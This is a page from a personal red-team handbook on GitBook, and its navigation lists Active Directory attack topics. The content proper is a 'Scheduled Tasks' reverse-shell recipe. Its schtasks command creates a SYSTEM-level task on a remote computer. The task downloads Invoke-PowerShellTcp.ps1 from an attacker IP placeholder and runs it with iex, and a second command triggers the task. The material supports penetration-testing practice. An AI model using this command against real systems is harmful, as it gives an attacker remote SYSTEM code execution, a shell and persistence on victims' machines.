🔥
AidenPearce369 HandBook
  • SCANNING
    • Nmap
  • ENUMERATION
    • FTP
    • SMTP
  • AD PENTESTING
    • TOOLS FOR RED TEAMING
    • BYPASS TECHNIQUES
      • EXECUTION POLICY
      • AV EVASION
      • APP LOCKER POLICY
      • CLM BYPASS
      • WINDOWS FIREWALL
      • OBFUSCATION
      • REGISTRY
    • AD ENUMERATION
      • Basic Enumeration
      • Enumerating Users
      • Enumerating User Properties
      • Enumerating Computers
      • Enumerating Domain
      • Enumerating Domain Controllers
      • Enumerating Domain SID
      • Enumerating Domain Policy
      • Enumerating Groups
      • Enumerating Log On & Log Off Activities
      • Enumerating File Shares
      • Enumerating OUs
      • Enumerating GPOs
      • Enumerating ACLs
      • Enumerating Domain Trusts & Forest Trusts
      • User Hunting
    • LATERAL MOVEMENT
      • LOCAL ADMIN ACCESS
      • FILE DOWNLOAD
      • POWERSHELL REMOTING
    • AD BLOODHOUND
    • MIMIKATZ
    • DUMPING SECRETS
      • MIMIKATZ
      • LSASS DUMP
      • VOLUME SHADOW COPY
      • REGISTRY
      • VAULT CREDENTIALS
      • INFORMATIONAL FILES
    • AD PERSISTENCE
      • MODIFYING SECURITY DESCRIPTORS
      • REMOTE REGISTRY BACKDOOR
      • DC-SHADOWING
    • DOMAIN PRIVILEGE ESCALATION
      • KERBEROASTING
      • AS-REP ROASTING
      • TARGETED AS-REP ROASTING
      • UNCONSTRAINED DELEGATION
      • CONSTRAINED DELEGATION
      • TRUST BASED DOMAIN ATTACKS
      • ABUSING MS-SQL TRUST
  • WINDOWS LOCAL PRIVILEGE ESCALATION
    • Find Local Admin Access
    • PowerShell Remoting
    • Service Unqouted Path
    • Modifiable Service
  • REVERSE SHELLS
    • PowerShell
    • Scheduled Tasks
    • Socat
  • TODO
Powered by GitBook
On this page
  1. REVERSE SHELLS

Scheduled Tasks

Get a reverse shell using Scheduled Tasks

schtasks /create /S <TARGET COMPUTER NAME> /SC Weekly /RU "NT Authority\SYSTEM" /TN "<TASK NAME>" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://<IP>/Invoke-PowerShellTcp.ps1''')'"

Run it by

schtasks /Run /S <TARGET COMPUTER NAME> /TN "<TASK NAME>"
PreviousPowerShellNextSocat

Last updated 3 years ago